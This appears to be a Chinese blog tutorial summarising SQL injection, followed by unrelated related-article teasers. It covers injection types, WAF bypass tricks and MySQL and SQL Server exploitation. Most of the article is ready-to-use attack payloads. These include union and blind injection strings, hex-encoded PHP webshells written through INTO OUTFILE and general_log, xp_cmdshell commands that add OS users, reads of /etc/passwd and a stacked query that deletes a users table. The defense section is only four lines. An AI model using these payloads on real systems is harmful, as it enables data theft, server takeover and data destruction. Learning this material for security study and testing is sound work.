lsj00凌松

Web安全之SQL注入总结

最近看了好多优秀的文章，总结了一下之前学过的SQL注入。

第一篇基础篇

1 SQL注入介绍 2 数据库特性

第二篇实战篇

2.1 SQL注入分类 2.2 手工注入流程

2.3 Mysql注入类型详解

1 报错注入 2盲注 3 多语句注入 4 内联注入

5 宽字节注入 6 二次编码注入 7 HTTP头注入 8 伪静态

2.4 过WAF技巧 2.5 SQL注入防御

第三篇 Mysql详解

1 文件写入 2 高权限跨库注入 3 写入webshell

第四篇 SQL Server详解

1.利用错误消息提取信息 2.获取元数据

3 Oeder by与union select

4 存储过程 5 动态执行

第一篇基础篇

1 SQL注入介绍

SQL是什么：

结构化查询语言(Structured Query Language)简称SQL，是一种数据库查询和程序设计语言，用于存取数据以及查询、更新和管理关系数据库系统；同时也是数据库脚本文件的扩展名。

SQL注入是什么：

通过在⽤户可控的参数中注⼊SQL语法，破坏原有SQL结构，修改原有SQL功能，达到出现意料之外结果的攻击⾏为。

SQL注入条件：

只有调用数据库的动态页面才有可有存在注入漏洞，动态页面包括asp、php、jsp 等。

SQL注入本质：

把用户输入的数据当作代码执行。

2 数据库特性

MySQL与MSSQL及ACCESS之间的区别

1.MySQL5.0以下没有information_schema这个默认数据库

2.ACCESS没有库名，只有表和字段，并且注入时，后面必须跟表名，ACCESS没有注释

String concatenation 字符串串联

Comments 注释

Database version 数据库类型和版本

Database contents 数据库内容

Conditional errors 条件错误

Batched (or stacked) queries 批处理（或堆叠）查询

Time delays 时间延迟

第二篇实战篇

2.1 SQL注入分类

按变量类型分：数字型和字符型

按HTTP提交方式分：POST注入、GET注入和Cookie注入

POST请求，

Cookie请求

常见的注入叫法：

按注入方式分：布尔注入、联合注入、多语句注入、报错注入、时间注入、内联注入

按数据库类型分：

sql：oracle、mysql、mssql、access、sqlite、postgersql

nosql：mongodb、redis

2.2 手工注入流程

对数据库的注入包括以下三点：查询数据，读写文件，执行命令

1.判断注入点

（1）字符型：SELECT * FROM Table WHERE id = '1';

当输入参数为字符串时，称为字符型。数字型与字符型注入最大的区别在于:数字类型不需要单引号闭合，而字符串类型-般要使用单引号来闭合。

（2）数字型：SELECT * FROM Table WHERE id = 1;

id =1 and 1=1

id = -1

（3）登陆型：SELECT * FROM Table WHERE username = '';

' OR '1

' OR 1 -- -

" OR "" = "

" OR 1 = 1 -- -

'='

'LIKE'

'=0--+

2.获取字段数

order by 二分法联合查询字段数，观察页面变化从而确定字段数

order by *(取临界值)

url?id=1用以下方式查询字段数

1' ORDER BY 1--+ True

1' ORDER BY 2--+ True

1' ORDER BY 3--+ True

1' ORDER BY 4--+ True

1' ORDER BY 5--+ False- 说明只有四个字段

1' UNION SELECT 1,2,3,4--+

3.显示位使用联合注入

替换显示位改成SQL语句，查看信息（当前数据库，版本及用户名）

union select version(),2,3

union select version(),2,3,4--+

union select user(),2,3,4--+#获取数据库用户信息

union select @@version_compile_os(),2,3,4--+#获取操作系统信息

union select concat (user(),',',database(),',',version()),2,3,4--+

union select concat(user(),0x2c,database(),0x2c,version()),2,3,4--+

4.数据库内容查询

数据库	语法
Oracle	oder by N # 爆出第⼀个数据库名 and 1=2 union select 1,2,(select banner from sys.v_ where rownum=1),4,5,6 from dual # 依次爆出所有数据库名,假设第⼀个库名为first_dbname and 1=2 union select 1,2,(select owner from all_tables where rownum=1 and owner<>'first_dbname'),4,5,6 from dual 爆出表名 and 1=2 union select 1,2,(select table_name from user_tables where rownum=1),4,5,6 from dual 有时候我们只想要某个数据库中含密码字段的表名,采⽤模糊查询语句，如下： and (select column_name from user_tab_columns where column_name like '%25pass%25')<0 爆出表tablename中的第⼀个字段名 and 1=2 union select 1,2,(select column_name from user_tab_columns where table_name='tablename' and rownum=1),4,5,6 from dual 依次下⼀个字段名 and 1=2 union select 1,2,(select column_name from user_tab_columns where table_name='tablename' and column_name<>'first_col_name' and rownum=1),4,5,6 from dual 若为基于时间或者基于bool类型盲注，可结合substr 、ASCII进⾏赋值盲测。若屏蔽关键函数，可尝试SYS_CONTEXT('USERENV','CURRENT_USER')类⽤法。
MYSQL	#测试字段内容 192.168.192.128/sqltest/news.php?id=-1 union select 1,group_concat(user(),0x5e5e,version(),0x5e5e,database(),0x5e5e,@@basedir),3 #查询当前库下所有表 192.168.192.128/sqltest/news.php?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #查询字段名 192.168.192.128/sqltest/news.php?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘表名’ #查询列名 union select column_name,2,3,4 from information_schema.columns where table_name = '列名'--+ #查询admin表下的⽤户名密码 192.168.192.128/sqltest/news.php?id=-1 union select 1,2,group_concat(name,0x5e,pass) from admin union select password ,2,3,4 from 表名--+ #读取系统⽂件（/etc/passwd，需转换为16进制） 192.168.192.128/sqltest/news.php?id=-1 union select 1,2,load_file(0x2f6574632f706173737764) #⽂件写⼊ 192.168.192.128/sqltest/news.php?id=-1 union select 1,2,0x3c3f70687020a6576616c28245f504f53545b615d293ba3f3e into outfile '/var/www/html/1.php'-- PS ：若权限不⾜，换个⽬录
MSSQL	#爆数据库版本（可先测⻓度） aspx?c=c1'//and//ascii(substring(@@version,1,1))=67//--&t=0 ps:在范围界定时，可利⽤⼆分查找结合⼤于⼩于来利⽤；亦可直接赋值脚本爆破，依次类推直⾄最后⼀字⺟。 #爆当前数据库名字 aspx?c=c1'//and//ascii(substring(db_name(),1,1))>200//--&t=0 #爆表 aspx?c=c1'//and//ascii(substring((select//top//1 name//from//dbname.sys.all_objects where type='U'//AND//is_ms_shipped=0),1,1))>0//--&t=0 #爆user表内字段 aspx?c=c1'//and//ascii(substring((select//top// 1//COLUMN_NAME from//dbname.information_schema.columns//where/ /TABLE_NAME='user'),1,1))>0//--&t=0 #爆数据 aspx?c=c1'//and//ascii(substring((select//top//1//fPwd//from//User),1,1))>0//--&t=0

2.3 Mysql注入类型详解

1 报错注入

https://www.cnblogs.com/wocalieshenmegui/p/5917967.html

2盲注

在盲注中常用的函数：

1.char() 解ASCII码

2.mid()截取字符串

举例：mid('hello',1,3)，从第1位开始截取3位，输出位hel

3.substr()与mid()相同，都为截取字符串

4.count()计算查询结果的行数

5.concat()查询结果合并但保持原有行数

6.group_concat()查询结果合并但都放在一行中

7.ascii() 查询ascii码

8.sleep(n)：将程序挂起一段时间 n为n秒

9.if(expr1,expr2,expr3):判断语句如果第一个语句正确就执行第二个语句如果错误执行第三个语句

10. length（）函数返回字符串的长度

延时盲注

通过页面沉睡时间判断

http://127.0.0.1/Less-9/?id=1'

and (if(ascii(substr(database(),1,1))>100,sleep(10),sleep(4)) --+

and if(length(version())>10,sleep(3),0);
and case length(version())>10 when 1 then sleep(3) else 0 end;

布尔盲注

http://127.0.0.1/index.php?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100#

猜数据库长度(利用二分法)

id=1 and (length(database()))>1
id=1 and (length(database()))>50

猜第一个字符，第二个字符，以此类推

and ascii(mid(database(),1,1))>1
and ascii(mid(database(),2,1))>1

查询当前数据库中所有表名

and (select count(table_name)from information_schema.tables where tables_schema=database())>1
and (select count(table_name)from information_schema.tables where tables_schema=database())>10

查询第一个表的长度

and (select length(table_name)from information_schema.tables where tables_schema=database()limit 0,1)>10

查询表的第一个字符

and ascii(mid((select table_name from information_schema.tables where table_schema=database()limit 0,1),1,1))>1

查询atelier表里有几个字段

and(select count(column_name)from information_schema.columns where table_name = 'atelier' and table_schema = database())>2

查询第一个字段长度

and length((select column_name from information_schema.columns where table_name='atelier' and table_schema= database()limit 0,1))>1

查询字段第一个字符

and ascii(mid((select column_name from information_schema.columns where table_schema = 'db83231_asfaa' and TABLE_NAME ='atelier' limit 0,1),1,1))>105

查询字段所有行数

and (select count(*) from db83231_asfaa.atelier)>4

查询字段名的行数（查询emails表，uname字段）

and (select count(uname)from security.emails)>7  查询uname的行数

查询字段内容

length((select username from security.users limit 0,1))>10
ascii(mid((select username from security.user limit 0,1),1,1))>100

3 多语句注入

可以执行多个语句，利用分号进行隔开

多语句意思就是可以执行多个语句，利用分号进行隔开

示例：
id=1";WAITFOR DELAY '0:0:3';delete from users; --+

id=1';select if(length(user(),1,1)>1,sleep(3),1) %23';select if(length((select table_name from information_schema.tables where table_schema=database()  limit 0,1),1,1)>1,sleep(3),1) %23

4 内联注入

举例：id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3

利用别名：

union select 1,2,3,4,a.id,b.id,* from(sys_admin as a inner join sys_admin as b on a.id=b.id)

5 宽字节注入

宽字节注入是由编码不统一所造成的，这种注入一般出现在PHP+MySQL和使用addslashes()函数中。

1）在PHP配置文件php.ini中存在magic_ quotes_ gpc 选项，被称为魔术引号，当此选项被打开时，使用GET、POST、Cookie所接收的' (单引号)、" (双引号)、\ (反斜线)和NULL字符都会被自动加上一个反斜线转义。

2）addslashes()函数产生的效果是让“ ' ”变成“\’”，让引号变得不再是“单引号”，只是一撇而已。一般绕过方式就是，想办法处理“ \' ”前面的“\”。

mysql在使用GBK编码的时候，会认为两个字符是一个汉字，%df%27或%81%27数据为空，就是说客户端发送的数据编码为gbk时，那么可能会吃掉转义字符\反斜杠，闭合之后页面恢复正常，存在宽字节注入。

修改一下header改为 header("Content-type:text/html;charset=gbk");

注入：%df%27 union select 1,2,3 #

测试出来就可以使用sqlmap跑了，加*构造注入点（比-p更稳定），

6 二次编码注入

代码中有urldecode()函数

%2527先解码成%27再解码成'单引号

sqlmap -u http://192.168.100.141/index.php/author=123 --prefix "%2527" --suffix "%23"

-prefix为设置前缀 -suffix为设置后缀

设置后缀，防止sqlmap使用内联注入

7 HTTP头注入

XFF头注入

update user set loat_loginip = '8.8.8.8' where id =1 and sleep(5) #' where username = 'zs';

id根据网站用户量取一个中间值，测试是否有注入，利用插件设置XFF头，如果网站不报错，可尝试此注入。

X-Forward-For：127.0.0.1' select 1,2,user()

User-Agent请求头注入

8 伪静态

www.xxx.com/xxx.html
控制台：document.lastModified
按上下箭头看时间是否改变如果改变就是伪静态

sqlmap中伪静态哪儿存在注入点就加*

xxx/id1/1/id2/2
sqlmap.py -u “xxx/id1/1*/id2/2″

xxx/news/class/?103.htm

sqlmap.py -u “xxx/news/class/?103*.html”

2.4 过WAF技巧

1.特征字符大小写（基本没用）

UnIoN SeLcT 1,2,3

2.内联注释

id=-1/*!UNION*/%20//*!SELECT*/%201,2,3

3.特殊字符代替空格

%09 tab键(水平)、%0a 换行、%0c 新的一页
%0d return功能、%0b tab键(垂直)、%a0空格

4.等价函数和逻辑符号

hex()、bin()==>ascii()
sleep()==>benchmark()
concat_ws()==>group_concat()
mid()、substr()==>substring()
@@version==>version()
@@datadir==>datadir()
逻辑符号：如and和or不能使用时，尝试&&和||双管道符。

5.特殊符号

反引号，select `version()`，绕过空格和正则
加号和点，"+"和"."代表连接，也可绕过空格和关键字过滤
@符号，用于定义变量，一个@代表用户变量，@@代表系统变量

6.关键字拆分

'se'+'lec'+'t'
%S%E%L%C%T 1,2,3
?id=1;EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell"net user"')
!和()：'or--+2=--!!!'2
id=1+(UnI)(oN)+(SeL)(EcT)

7.加括号绕过

小括号

union (select+1,2,3+from+users)%23
union(select(1),(2),(3)from(users))
id=(1)or(0x50=0x50)
id=(-1)union(((((((select(1),hex(2),hex(3)from(users))))))))

花括号

select{x user}from{x mysql.user}
id=-1 union select 1,{x 2},3

8.过滤and和or下的盲注

id=strcmp(left((select%20username%20from%20users%20limit%200,1),1),0x42)%23
id=strcmp(left((select+username+from+limit+0,1),1,0x42)%23

9.白名单绕过

拦截信息：

GET /pen/news.php?id=1 union select user,password from mysql.user

绕过：

GET /pen/news. php/admin?id=1 union select user,password from mysql. user
GET /pen/admin/..\news. php?id=1 union select user,password from mysql. user

10.HTTP参数控制

（1）HPP（HTTP Parmeter Polution）（重复参数污染）

举例：

index.php?id=1 union select username,password from users
index.php?id=1/**/union/*&id=*/select/*&id=*/username.password/*&id=*/from/*&id=*/users

HPP又称作重复参数污染，最简单的是?uid=1&uid=2&uid=3，对于这种情况，不用的web服务器处理方式不同。

具体WAF如何处理，要看设置的规则，不过示例中最后一个有较大可能绕过

（2）HPF（HTTP Parmeter Fragment）（HTTP分割注入）

HTTP分割注入，同CRLF有相似之处（使用控制字符%0a、%0d等执行换行）

举例：

/?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users—

2.5 SQL注入防御

1.对用户输入的内容进行转义

2.限制关键字的输入，如单引号、双引号、右括号等，限制输入的长度

3.使用SQL语句预处理，对SQL语句进行预编译，然后进行参数绑定，最后传入参数

4.添加WAF，防火墙等

第三篇 Mysql详解

默认数据库

Information_schemn : MySQL5.0以上自带数据库，记录当前MySQL下所有的数据库名，表名，列名信息
       Information_schemn.tables :     表名信息表
       Information_schemn.columns : 列名信息表
       table_name      表名
   column_name 列名
   table_schema 数据库名

Mysql常用的函数：

1 文件写入

union select load_file('c:/hd.ini'),2,3,4 --+

union select load_file(0x633A2F68642E696E69),2,3,4 --+ #去掉单引号的方法

union select 一句话的编码 ,2,3,4 Into outfile 'c:/c.php' --+ #写入一句话

2 高权限跨库注入

root权限下，网站A无注入点，网站B有MySQL注入，且网站A与网站B的数据库存在同一MYSQl数据库下，这时可以在网站B进行跨库注入，获取A站的数据。

获取所有数据库名：

union select schema_name ,2,3,4 from information_schema.schemata

获取指定数据库A中表名信息：

union select table_name ,2,3,4 from information_schema.tables where table_schema = 'A'

获取指定表名AA下列名信息：

union select column_name ,2,3,4 from information_schema.columns where table_name = 'AA'

获取指定数据：

union select username ,password,3,4 from A.BB

3 写入webshell

利用Union select 写入

这是最常见的写入方式，union 跟select into outfile，将一句话写入evil.php，仅适用于联合注入。

具体权限要求：secure_file_priv支持web目录文件导出、数据库用户File权限、获取物理路径。

?id=1 union select 1,"",3 into outfile 'E:/study/WWW/evil.php'

?id=1 union select 1,0x223c3f70687020406576616c28245f504f53545b2767275d293b3f3e22,3 into outfil

利用分隔符写入

当Mysql注入点为盲注或报错，Union select写入的方式显然是利用不了的，那么可以通过分隔符写入。SQLMAP的 --os-shell命令，所采用的就是一下这种方式。

具体权限要求：secure_file_priv支持web目录文件导出、数据库用户File权限、获取物理路径。

?id=1 LIMIT 0,1 INTO OUTFILE 'E:/study/WWW/evil.php' lines terminated by 0x20273c3f70687

同样的技巧，一共有四种形式：

?id=1 INTO OUTFILE '物理路径' lines terminated by （一句话hex编码）#

?id=1 INTO OUTFILE '物理路径' fields terminated by （一句话hex编码）#

?id=1 INTO OUTFILE '物理路径' columns terminated by （一句话hex编码）#

?id=1 INTO OUTFILE '物理路径' lines starting by （一句话hex编码）#

利用log写入

新版本的MySQL设置了导出文件的路径，很难在获取Webshell过程中去修改配置文件，无法通过使用select into outfile来写入一句话。这时，我们可以通过修改MySQL的log文件来获取Webshell。

具体权限要求：数据库用户需具备Super和File服务器权限、获取物理路径。

show variables like '%general%';         #查看配置
set global general_log = on;             #开启general log模式
set global general_log_file = 'E:/study/WWW/evil.php';
                                         #设置日志目录为shell地址
select ''         #写入shell
set global general_log=off;              #关闭general log模式

第四篇 SQL Server详解

1.利用错误消息提取信息

(1)枚举当前表及列

查询root用户的详细信息，SQL语句如下 : select * from users where username=' root'

可以输入以下语句： having 1=1--
最终执行SQL语句为: select * from users where username=' root ' and password= ' root' having 1=1-- '

那么SQL执行器将抛出一个错误(因版本差异，显示错误信息也稍有差异):

消息8120，级别16，状态1，第2行
选择列表中的列'users.id' 无效，因为该列没有包含在聚合函数或GROUP BY子句中。

可以发现当前表名为“users"，并且存在“ID”列名，攻击者可以利用此特性继续得到其他列名，输入如下SQL语句:
password=' root' group by users.id having 1=1--'

(2)利用数据类型错误提取数据

如果试图将一个字符串与非字符串比较，或者将一个字符串转换为另外一个不兼容的类型时，那么SQL编辑器将会抛出异常，比如以下SQL语句:

password= ' root' and 1 > ( select top1 username from users )

执行器错误提示:
消息245,级别16,状态1，第2行
在将varchar值'root' 转换成数据类型int时失败。

可以发现root账户，利用此方法可以递归推导出所有的账户信息:
password=' root' and 1 > ( select top 1 username from users where username not in(' root') )

不嵌入子查询，使用case，convert 函数：

password=' root' and 1=convert (int，(select top 1 users. username from users ) )

感觉递归比较麻烦，可以通过使用FORXMLPATH语句将查询的数据生成XML

password=' root' AND 1=CONVERT (int ，

(select stuff((select ','+ users.username，'I' +users.password from users for xml path(')),1,1,'')))

2.获取元数据

SQL Server提供了大量视图，便于取得元数据。下面将使用INFORMATION SCHEMA.TABLES与INFORMATION_SCHEMA.COLUMNS视图取得数据库表以及表的字段。

3 Oeder by与union select

4 存储过程

存储过程(Stored Procedure)是在大型数据库系统中为了完成特定功能的一组SQL“函数”，如:执行系统命令，查看注册表，读取磁盘目录等。攻击者最常使用的存储过程是“xp_cmdshell",这个存储过程允许用户执行操作系统命令。

例如:

htp://www.ecbug.org/test.aspx?id=1 存在注入点，那么攻击者就可以实施命令攻击:
id=1;exec xp_ cmdshell 'net user test test /add'

最终执行SQL语句如下:
select * from table where id=1;exec xp_ cmdshell 'net user test test /add'
攻击者可以直接利用xp_ cmdshell 操纵服务器。

注:并不是任何数据库用户都可以使用此类存储过程，用户必须持有CONTROL SERVER权限。

常见的危险的存储过程，攻击者也可以自己写一些存储过程。

5 动态执行

SQL Server支持动态执行语句，用户可以提交-一个字符串来执行SQL语句，例如:
exec(' select use rname, password from users ' )
exec(' selec'+'t username, password fro'+'m users' )

也可以通过定义十六进制的SQL语句，使用exec函数执行。大部分Web应用程序防火墙都过滤了单引号，利用exec执行十六进制SQL语句并不存在单引号，这一特性可以突破很多防火墙及防注入程序，如:
declare @query varchar (888)
select @query=0x7365 6C6563742031
exec (@query)
或者
declare/**/@query/**/varchar (888)/**/select/**/@query=0x73656C6563742031/**/exe c (@query)

参考：小迪，HACK学习素念，

你可能感兴趣的:(网络安全)

【数据分析】抓包工具的定义常见类型分类使用场景及注意事项
抓包工具的定义常见类型分类使用场景及注意事项-CSDN直播抓包工具的定义常见类型分类使用场景及注意事项抓包工具的定义常见类型分类使用场景及注意事项抓包工具概述抓包工具顾名思义是一种用于捕获并分析网络数据包的软件或硬件工具它能够在数据传输过程中截取并记录网络流量让用户能够深入理解并排查网络问题这类工具的用途广泛从网络安全测试到应用程序调试都离不开抓包工具的帮助在众多的抓包工具中WiresharkFi
《跨域资源共享CORS的深层逻辑与前端实践精要》
不同源头的资源交互已成为常态，而跨域资源共享（CORS）正是支撑这种交互的隐形架构。现代Web安全体系中平衡开放与防护的精妙设计。理解CORS的深层逻辑，不仅能解决实际开发中的跨域难题，更能触及网络安全与资源流通的核心矛盾，为前端工程师构建稳健的应用提供底层认知支撑。跨域资源共享的诞生，源于网络安全与应用发展的必然冲突。浏览器的同源策略，作为早期网络安全的基石，通过限制不同源文档的交互，有效阻挡了
中国顶级黑客名单 2501_92914741 facebook twitter paddle 微信开放平台
网名：KING真实名字：谭绪武OICQ：1576172简介：原中国黑客联盟站长，2001年中]=美黑客大战领军人物之一，中国第1代黑客之一，中国最早期黑客组织中国黑客联盟的创始人，中国黑客界泰斗级元老，中国传奇黑客。网名：sunx真实姓名：孙华OICQ：239670简介：资深网络安全专家、软件设计师、Unix专家,在黑客、病毒等技术上均具有顶尖级水平，对系统内核研究有很高的造诣，程序反编译、跟踪、
Centos7防火墙会飞的灰大狼 Centos7 linux
Centos7防火墙前言：本来想在系统那里去说防火墙但防火墙要说的要很多使用单独做一章文章去讲防火墙~~‍在CentOS7中，防火墙是保障系统网络安全的核心组件，默认采用firewalld作为防火墙管理工具（替代了CentOS6的iptables服务），底层仍基于iptables内核模块实现规则控制。‍iptablesiptables命令的完整格式较为复杂，其核心结构由命令选项、表（table）、
网络安全架构与网络拓扑的深度解析火箭统网络安全攻击面减少网络架构网络拓扑数据包转发
背景简介网络安全是当前信息时代的核心挑战之一，随着网络技术的快速发展，攻击手段也日益多样化。本篇博客文章基于提供的书籍章节内容，深入分析网络安全中的攻击面减少策略、网络架构的设计与管理，以及不同网络拓扑的特点，旨在为读者提供一个全面的网络安全知识框架。攻击面减少攻击面是指一个系统或软件暴露给潜在攻击者的全部潜在入口点。减少攻击面是提高网络安全的有效手段之一。通过减少运行的代码量、限制未受信任用户的
网络安全第14集不灭锦鲤 web安全安全
前言：小迪安全14集，这集重点内容：0、什么是js渗透测试？在javascript中也存在变量和函数，存在可控变量和函数就有可能存在在漏洞，js开发的web应用和php、java开发的区别是，js能看得到的源代码，php看不到，但是风险就是未授权访问、配置信息泄露（加密算法、key秘钥等），源代码看得到，存在更多的url泄露，从而可能会出现未授权访问，从url，前提：web应用可以采用前端语言或后
与网络安全相比，为什么只会Python很难找到工作？程序员羊羊网安工程师网络安全黑客 web安全 python 安全数据库网络开发语言学习
前言作为一门广泛应用的编程语言，Python在众多领域中都有着不可忽视的地位。然而，对于那些寻求就业的程序员来说，仅仅掌握Python可能并不足以让他们轻松地找到一份理想的工作。本文将深入探讨为什么只会Python很难找到工作，以及分析在职程序员在Python岗位上可能会遇到的一些情况。一、Python的优势与局限性Python的优势Python作为一种高级编程语言，具有简洁、易读、易于学习等特点
网络安全三要素岁月静好2025 安全
网络安全三要素1.保密性信息的保密性（Confidentiality）是网络安全的核心概念之一，它指的是确保信息只能被授权的用户访问，防止数据泄露给未授权的个人、系统或过程2。1.1保密性的核心含义限制访问：只有经过授权的用户才能查看或使用敏感信息。防止泄露：避免信息在传输、存储或处理过程中被窃取或监听。保护隐私：确保个人、企业或国家的隐私数据不被非法获取。1.3实现保密性的常见技术技术手段作用说
运维-资产梳理
资产梳理一、明确目标与范围1.1、确定梳理目的网络安全：缩小攻击面、识别风险点。资源配置：优化资源利用率、降低成本。合规要求：满足法律法规或行业标准（如等保、ISO27001）。1.2、界定资产范围物理资产：服务器、网络设备、终端设备、IoT设备等。数字资产：操作系统、数据库、应用程序、域名、IP地址、云资源、容器/K8s集群、SaaS应用。数据资产：敏感数据（如客户信息、财务数据）、业务数据、备
AI+MCP智能研判系统架构
AI+MCP智能研判系统架构1.系统概述1.1核心理念AI+MCP智能研判系统是一个创新的网络安全分析平台，通过将大语言模型（LLM）的智能理解能力与MCP（ModelContextProtocol）协议的标准化工具调用能力相结合，实现了"自然语言提问→AI智能理解→MCP工具调用→AI深度研判→智能结果输出"的完整闭环。1.2技术创新点智能意图识别：基于LLM的自然语言理解，自动解析用户查询意图
AI驱动的安全自动化响应架构设计 TechVision大咖圈架构设计合集人工智能人工智能安全自动化安全架构架构设计
作者寄语：在这个数字化转型的时代，安全不再是"事后诸葛亮"，而应该是"未卜先知"。希望这套架构设计能为你的安全建设提供一些启发和参考。如果你有任何问题或想法，欢迎一起交流探讨！文章目录1.引言：当AI遇上网络安全传统安全响应的痛点AI自动化的必要性2.架构设计核心理念设计原则关键能力要求3.系统架构全景图整体架构概览核心组件介绍4.数据处理与威胁检测层数据采集引擎AI检测算法5.智能决策与响应层决
【网络安全】DDOS攻击第十六年盛夏. 网安 web安全 ddos 安全
如果文章不足还请各位师傅批评指正！你有没有过这种经历：双11抢券时页面卡成幻灯片，游戏团战突然全员掉线，刷视频时进度条永远转圈圈？除了“网渣”，可能还有个更糟的原因——你正被DDoS攻击“堵门”了！今天用3分钟讲透：什么是DDoS？它和其他攻击有啥区别？怎么发现？怎么防？先看个“生活化栗子”：什么是DDoS攻击？想象你常去的奶茶店，平时10个顾客能轻松接待。突然某天，来了1000个“假顾客”——他
网络安全基础知识【4】
DNS的主要作用DNS服务器可以为客户机提供“域名与IP地址”的地址解析服务简述DNS正向反向的含义正向：根据域名查找IP地址反向：根据IP地址查找域名简述常见的DNS资源记录类型，并描述各自的含义A：正向解析PTR：反向解析（将IP地址映射为域名）CNAME：别名解析DNS域名解析查询方式的分类1、递归查询2、迭代查询DHCP的作用可以给终端联网设备分配网络参数DHCP有哪些角色1、DHCP服务
Qt 网络编程进阶：网络安全与加密编程与实战 Qt一站式学习 qt 网络 web安全 c++c语言
在当今数字化时代，网络安全已成为软件开发中不可忽视的关键环节。Qt作为一款强大的跨平台应用开发框架，提供了全面的网络安全与加密功能，帮助开发者构建安全可靠的网络应用。本文将深入探讨Qt网络编程中的安全与加密技术，包括SSL/TLS通信、数据加密、证书管理、安全认证等方面的核心知识与实践经验。一、SSL/TLS基础配置1.启用HTTPS通信#include#include#include#inclu
网站渗透测试完全手册：零基础到进阶，系统学习网络安全攻防
渗透测试介绍渗透测试就是模拟攻击者入侵系统，对系统进行一步步地渗透，发现系统地脆弱环节和隐藏风险。最后形成测试报告提供给系统所有者。系统所有者可根据该测试报告对系统进行加固，提升系统的安全性，防止真正的攻击者入侵。渗透测试的前提一定是得经过系统所有者的授权!未经过授权的渗透测试，就是违法行为!渗透测试意义信息安全评估的重要方法，有利于掌握系统整体安全强度。模拟黑客攻击和思维，评估计算机潜在风险。发
2025年网络安全工程师转行指南：必备技能与入行路径
对于提出这个问题的小伙伴来讲，首先，已经明确了是要转行的，并且是清晰了网络安全行业，对于目标感非常强的转行小伙伴来讲，知了姐分别从个人条件、行业、学习方法等三个层面来提供关于“转行人员想做网络安全工程师有哪些要求？”。1、个人学习条件个人学习条件主要关注以下三个方面：专业、学历、年龄。网络安全因目前行业发展非常快速，企业用人需求也非常大，企业对于学历没有太多硬性要求，学历专科/本科都可以，但如果是
网信安全丨十个方面100个网络安全相关知识点，快来学习！从零基础到精通，收藏这篇就够了！七七Seven～ web安全安全学习服务器机器学习网络
网络安全风险无处不在，现梳理了100个网络安全相关的小知识，希望能进一步提升大家的安全意识，帮助大家建立更加安全的网络环境。一、账号密码安全1.如果有初始密码，应尽快修改。2.密码长度不少于8个字符。3.不要使用单一的字符类型，例如只用小写字母，或只用数字。4.用户名与密码不要使用相同字符。5.常见的弱口令尽量避免设置为密码。6.自己、家人、朋友、亲戚、宠物的名字避免设置为密码。7.生日、结婚纪念
【超长爽文】网络安全从业者面试指南（非常详细）从零基础入门到精通，收藏这篇就够了黑客阿伦 web安全开发语言网络安全网络安全计算机网络
文章为笔者偶然看到的github项目《网络安全面试指南》，作者FeeiCN，读完内容深感作者的用心，尽管一些观点因为时间原因与当下行情存在差异，但仍旧值得大家参考，希望能给大家在这行业寒冬带来一些启发，愿正在找工作的朋友一切顺利。多年来筛选了数以千记的简历，为何很多人连面试的机会都没有？参与了数以百记的应聘者的面试，为何如此多的人没有通过最终面试？能力当然是最重要的，可我却见过很多能力不比已经入职
【网络安全】Metasploit 生成的 Shellcode 的导入函数解析以及执行流程分析（1） IT老涵程序员安全网络网络安全信息安全计算机网络
2021年4月，研究人员深入分析了CobaltStrike渗透测试技术，以及它的一些签名规避技术是如何在检测技术下失效的。在本文中，我们将深入讨论Metasploit，这是一个可以与CobaltStrike互操作的常用框架。在本文中，我们将讨论以下主题：shellcode的导入解析——Metasploitshellcode如何定位来自其他DLL的函数，以及我们如何预先计算这些值来解析来自其他有效载
泷羽sec专题课笔记-- Linux作业--开机自启动方法以及破解 grrrr_1 笔记 web安全网络
本笔记为泷羽sec《红队全栈课程》学习笔记，课程请可自行前往B站学习，课程/笔记主要涉及网络安全相关知识、系统以及工具的介绍等，请使用该课程、本笔记以及课程和笔记中提及工具的读者，遵守网络安全相关法律法规，切勿进行违法违规违纪的操作。写在最前面的话，我们为什么要学习网络安全这门技术：维护国家安全防范网络攻击：网络安全威胁已成为国家安全的重要挑战。学习网络安全有助于识别和防范来自国内外的网络攻击，防
sudo rm -rf /* → sudo jail -t 3650：当Linux命令遇上《个人信息保护法》 Akins2025 linux python c++
尊敬的审核：本人文章《sudorm-rf/*→sudojail-t3650：当Linux命令遇上〈个人信息保护法〉》1.纯属技术交流，无任何违法内容2.所有法律引用均来自公开条文3.请依据《网络安全法》第12条“不得无故删除合法内容”处理附：本文结构已通过区块链存证【著作权声明】•2025年7月21日19:08前所有文章已通过CSDN实名认证追溯•合规技术交叉内容已申请存证（区块链时间戳）•侵权必
《网络安全审查办法》极客生存指北（赛博朋克版）：怎么在数据洪流中优雅地狗住
尊敬的审核：本人文章《〈网络安全审查办法〉极客生存指北（赛博朋克版）：怎么在数据洪流中优雅地狗住》1.纯属技术交流，无任何违法内容2.所有法律引用均来自公开条文3.请依据《网络安全法》第12条“不得无故删除合法内容”处理附：本文结构已通过区块链存证【著作权声明】•2025年7月21日19:08前所有文章已通过CSDN实名认证追溯•法律技术交叉内容已申请存证（区块链时间戳）•侵权必究（参考《刑法》第
（路过一下……）如何用Clang助攻码农兄弟打赢爱情保卫战 Akins2025 c++
尊敬的审核：本人文章《（路过一下……）如何用Clang助攻码农兄弟打赢爱情保卫战》1.纯属技术交流，无任何违法内容2.所有法律引用均来自公开条文3.请依据《网络安全法》第12条“不得无故删除合法内容”处理附：本文已存证（副标题：当gcc-O2遇到《民法典》第1079条）一、核心技术：婚姻法LLVM前端cpp//爱情矛盾诊断系统if(wife.anger>0x7FFFFFFF){clang-emit
《职工带薪年假条例》硅基奴隶解放工具.jar——程序猿的第一课应该是学会休息 Akins2025 c++python bash java
尊敬的审核：本人文章《〈职工带薪年假条例〉硅基奴隶解放工具.jar——程序猿的第一课应该是学会休息》1.纯属技术交流，无任何违法内容2.所有法律引用均来自公开条文3.请依据《网络安全法》第12条“不得无故删除合法内容”处理附：本文结构已通过区块链存证java/***《职工带薪年假条例》V2025.7.27程序猿特供版*编译环境：JDK1.8(因为公司还没升级)*依赖包：*importjava.ut
网络安全-网络安全智能体所有详细工作原理和架构及案例
